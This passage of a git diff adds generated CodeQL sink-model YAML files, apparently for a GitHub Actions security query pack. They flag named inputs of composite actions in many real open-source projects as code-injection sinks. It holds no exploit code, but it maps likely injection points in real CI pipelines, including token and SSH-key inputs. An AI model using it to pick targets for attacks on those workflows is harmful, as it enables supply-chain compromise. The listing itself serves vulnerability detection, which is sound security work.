/dev/null +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pardeike/harmony", "*", "inputs.architecture", "code-injection", "generated"] + - ["pardeike/harmony", "*", "inputs.build_configuration", "code-injection", "generated"] + - ["pardeike/harmony", "*", "inputs.target_framework_array", "code-injection", "generated"] + - ["pardeike/harmony", "*", "inputs.target_framework", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml new file mode 100644 index 000000000000..4bc0d5f660d5 --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pennylaneai/pennylane", "*", "inputs.requirements_file", "code-injection", "generated"] + - ["pennylaneai/pennylane", "*", "inputs.additional_pip_packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml new file mode 100644 index 000000000000..5f38860c86dd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["phalcon/cphalcon", "*", "inputs.target-name", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.ext-path", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.pecl", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.arch", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.msvc", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.ts", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.php_version", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.php-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml new file mode 100644 index 000000000000..8b45d92a5e0e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["philosowaffle/peloton-to-garmin", "*", "inputs.framework", "code-injection", "generated"] + - ["philosowaffle/peloton-to-garmin", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml new file mode 100644 index 000000000000..7767c6497806 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["php/php-src", "*", "inputs.jitType", "code-injection", "generated"] + - ["php/php-src", "*", "inputs.runTestsParameters", "code-injection", "generated"] + - ["php/php-src", "*", "inputs.token", "code-injection", "generated"] + - ["php/php-src", "*", "inputs.configurationParameters", "code-injection", "generated"] + - ["php/php-src", "*", "inputs.libmysql", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml new file mode 100644 index 000000000000..419909764b7d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["phpdocumentor/phpdocumentor", "*", "inputs.passphrase", "code-injection", "generated"] + - ["phpdocumentor/phpdocumentor", "*", "inputs.secret-key", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml new file mode 100644 index 000000000000..6e2b5247f292 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pinecone-io/pinecone-python-client", "*", "inputs.googleapis_common_protos_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "inputs.protobuf_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "inputs.lz4_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "inputs.grpcio_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "inputs.pinecone_client_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml new file mode 100644 index 000000000000..d012a6f2fbb3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pixijs/pixijs", "*", "inputs.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml new file mode 100644 index 000000000000..aead619b40be --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["posthog/posthog", "*", "inputs.group", "code-injection", "generated"] + - ["posthog/posthog", "*", "inputs.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml new file mode 100644 index 000000000000..b82360205f74 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["primer/react", "*", "inputs.token", "code-injection", "generated"] + - ["primer/react", "*", "inputs.schedule-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml new file mode 100644 index 000000000000..e5fad4e5256e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["project-chip/connectedhomeip", "*", "inputs.with", "code-injection", "generated"] + - ["project-chip/connectedhomeip", "*", "inputs.action", "code-injection", "generated"] + - ["project-chip/connectedhomeip", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml new file mode 100644 index 000000000000..71f90682b1bb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["projectnessie/nessie", "*", "inputs.job-name", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "inputs.java-version", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "inputs.job-instance", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "inputs.job-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml new file mode 100644 index 000000000000..07421b98859a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["psf/black", "*", "inputs.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml new file mode 100644 index 000000000000..81fbb3ae9e43 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pyca/cryptography", "*", "inputs.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml new file mode 100644 index 000000000000..9587351ce1d6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pyg-team/pytorch/geometric", "*", "inputs.torchvision-version", "code-injection", "generated"] + - ["pyg-team/pytorch/geometric", "*", "inputs.cuda-version", "code-injection", "generated"] + - ["pyg-team/pytorch/geometric", "*", "inputs.torch-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml new file mode 100644 index 000000000000..080835504a6b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["python-poetry/poetry", "*", "inputs.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml new file mode 100644 index 000000000000..86ce393fbc57 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["python/mypy", "*", "inputs.install_project_dependencies", "code-injection", "generated"] + - ["python/mypy", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml new file mode 100644 index 000000000000..182558589d78 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml 
@@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["quarto-dev/quarto-cli", "*", "inputs.keychain-pw", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.keychain", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.certificate-file", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.certificate-value", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.working-dir", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.bucket", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.base-url", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.files", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.binary-name", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml new file mode 100644 index 000000000000..1839670baa2c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["quay/clair", "*", "inputs.tag", "code-injection", "generated"] + - ["quay/clair", "*", "inputs.repo", "code-injection", "generated"] + - ["quay/clair", "*", "inputs.quay", "code-injection", "generated"] + - ["quay/clair", "*", "inputs.duration", "code-injection", "generated"] + - ["quay/clair", "*", "inputs.token", "code-injection", "generated"] + - ["quay/clair", "*", "inputs.dir", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml new file mode 100644 index 000000000000..203dabaa3b9f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["quickwit-oss/quickwit", "*", "inputs.target", "code-injection", "generated"] + - ["quickwit-oss/quickwit", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml new file mode 100644 index 000000000000..7247d125324a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml 
@@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["r-lib/actions", "*", "inputs.lockfile-create-lib", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.dependencies", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.upgrade", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.pak-version", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.profile", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.install-pandoc", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.extra-packages", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.packages", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.needs", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.error-on", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.build_args", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.args", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.check-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml new file mode 100644 index 000000000000..22c8a56deacb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["randombit/botan", "*", "inputs.target", "code-injection", "generated"] + - ["randombit/botan", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml new file mode 100644 index 000000000000..7476425a35f7 --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["raspberrypi/documentation", "*", "inputs.secondary_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.destination", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.source", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.bastion_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.primary_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.public_bastion_host_keys", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.private_ssh_key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml new file mode 100644 index 000000000000..3c96c1b159db --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ray-project/kuberay", "*", "inputs.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml new file mode 100644 index 000000000000..da9def79964b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["readthedocs/actions", "*", "inputs.single-version", "code-injection", "generated"] + - ["readthedocs/actions", "*", "inputs.platform", "code-injection", "generated"] + - ["readthedocs/actions", "*", "inputs.message-template", "code-injection", "generated"] + - ["readthedocs/actions", "*", "inputs.project-language", "code-injection", "generated"] + - ["readthedocs/actions", "*", "inputs.project-slug", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml new file mode 100644 index 000000000000..80c917396846 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["reflex-dev/reflex", "*", "inputs.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml new file mode 100644 index 000000000000..2121bb23710b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["renovatebot/renovate", "*", "inputs.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml new file mode 100644 index 000000000000..f0acc3056726 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rethinkdb/rethinkdb", "*", "inputs.command", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "inputs.install_command", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "inputs.env_activate", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "inputs.default_python_driver_commit_hash", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml new file mode 100644 index 000000000000..f099314b16e4 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["risc0/risc0", "*", "inputs.key", "code-injection", "generated"] + - ["risc0/risc0", "*", "inputs.components", "code-injection", "generated"] + - ["risc0/risc0", "*", "inputs.targets", "code-injection", "generated"] + - ["risc0/risc0", "*", "inputs.toolchain", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml new file mode 100644 index 000000000000..971cd92e3cd6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rocketchat/rocket.chat", "*", "inputs.build-containers", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "inputs.release", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "inputs.docker-tag", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "inputs.root-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml new file mode 100644 index 000000000000..42aba6b02dd2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rook/rook", "*", "inputs.use-tmate", "code-injection", "generated"] + - ["rook/rook", "*", "inputs.kubernetes-version", "code-injection", "generated"] + - ["rook/rook", "*", "inputs.additional-namespace", "code-injection", "generated"] + - ["rook/rook", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml new file mode 100644 index 000000000000..71d71f6cb21d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["roots/trellis", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml new file mode 100644 index 000000000000..60a29d3edf7e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ruby/debug", "*", "inputs.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml new file mode 100644 index 000000000000..84d174e5a050 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ruby/ruby", "*", "inputs.builddir", "code-injection", "generated"] + - ["ruby/ruby", "*", "inputs.srcdir", "code-injection", "generated"] + - ["ruby/ruby", "*", "inputs.test-opts", "code-injection", "generated"] + - ["ruby/ruby", "*", "inputs.report-path", "code-injection", "generated"] + - ["ruby/ruby", "*", "inputs.launchable-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml new file mode 100644 index 000000000000..5cc3a3a74750 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_PASS", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_USER", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "inputs.sim_output", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "inputs.RUSEFI_SSH_PASS", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml new file mode 100644 index 000000000000..cee842ae1c6f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["saltstack/salt", "*", "inputs.version", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.upload-chunk-size", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.restore-keys", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.save-always", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.lookup-only", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.fail-on-cache-miss", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.enableCrossOsArchive", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.key", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml new file mode 100644 index 000000000000..535e832c1c32 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sap/sapmachine", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml new file mode 100644 index 000000000000..e1902fb488fd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["scala-native/scala-native", "*", "inputs.llvm-version", "code-injection", "generated"] + - ["scala-native/scala-native", "*", "inputs.scala-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml new file mode 100644 index 000000000000..2ede3df98649 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["scitools/iris", "*", "inputs.version", "code-injection", "generated"] + - ["scitools/iris", "*", "inputs.install_packages", "code-injection", "generated"] + - ["scitools/iris", "*", "inputs.env_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml new file mode 100644 index 000000000000..1bea0aef9358 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["scylladb/scylla-operator", "*", "inputs.containerImageName", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "inputs.githubToken", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "inputs.githubRef", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "inputs.githubRepository", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml new file mode 100644 index 000000000000..4a8bae9d2a1c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["shader-slang/slang", "*", "inputs.platform", "code-injection", "generated"] + - ["shader-slang/slang", "*", "inputs.os", "code-injection", "generated"] + - ["shader-slang/slang", "*", "inputs.runs-on", "code-injection", "generated"] + - ["shader-slang/slang", "*", "inputs.config", "code-injection", "generated"] + - ["shader-slang/slang", "*", "inputs.compiler", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml new file mode 100644 index 000000000000..c63ed017ae17 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["shaka-project/shaka-player", "*", "inputs.state", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "inputs.context", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "inputs.job_name", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "inputs.token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml new file mode 100644 index 000000000000..544fc4b99516 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml 
